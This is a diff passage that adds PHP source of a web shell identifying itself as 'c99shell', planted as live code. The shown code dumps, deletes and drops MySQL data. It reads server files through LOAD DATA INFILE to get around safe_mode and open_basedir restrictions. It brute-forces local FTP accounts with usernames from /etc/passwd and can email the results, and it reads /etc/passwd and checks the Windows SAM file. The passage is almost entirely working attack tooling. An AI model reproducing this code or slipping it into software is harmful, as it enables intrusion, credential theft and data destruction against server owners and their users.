+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
